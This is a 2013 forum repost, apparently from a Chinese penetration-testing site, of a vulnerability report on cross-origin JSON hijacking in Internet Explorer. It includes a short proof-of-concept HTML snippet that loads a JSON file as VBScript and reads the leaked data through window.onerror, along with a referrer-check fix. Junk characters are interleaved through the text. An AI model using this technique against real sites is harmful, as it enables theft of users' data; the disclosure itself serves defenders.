中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
! H$ `; z/ l6 z. M' D m# b# o
9 v/ Z n6 j5 e
由于某些资源容器对数据处理不当导致json劫持漏洞.
2 o: f7 z- A% u* V2 k& `
详细说明:
0 y6 [, ?) v" q# {( L; V- h% D9 R
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
0 E, |: x4 m, h% d
<script language=vbscript></script>
% x- }4 n/ j- h* }- s8 a
3 k, h0 p! D7 \4 g/ F$ T3 G
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
* x6 e" H) \! d2 K8 V
漏洞证明:
3 X( I7 b7 y& W6 s$ d
<script>
7 y3 o, V4 |- d+ E) j
window.onerror=function(_){
/ z. z% {" r$ F" x
alert(_)
2 ^9 }4 U! H ~* Q: N9 r" t
}
. V3 {2 W% A4 m2 K4 p3 u
</script>
3 \+ k6 ^: E+ A# @/ y3 E$ `
<script language=vbscript src=1.json></script>
: L2 [: ?" d0 z! \4 w, N
a" ~' v; P4 a# }# _& C4 a# [
/ P% U5 H- q8 ~! `4 F" R2 H$ ]+ U
1.json:
2 m8 W+ a3 y G! H9 B
[{"name":"sogili","age":19}]
0 X7 L7 E+ s3 b6 i! E2 A9 v, `% q- S) Q
修复方案:
v/ {& m8 p. u( F( g( }( ^
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2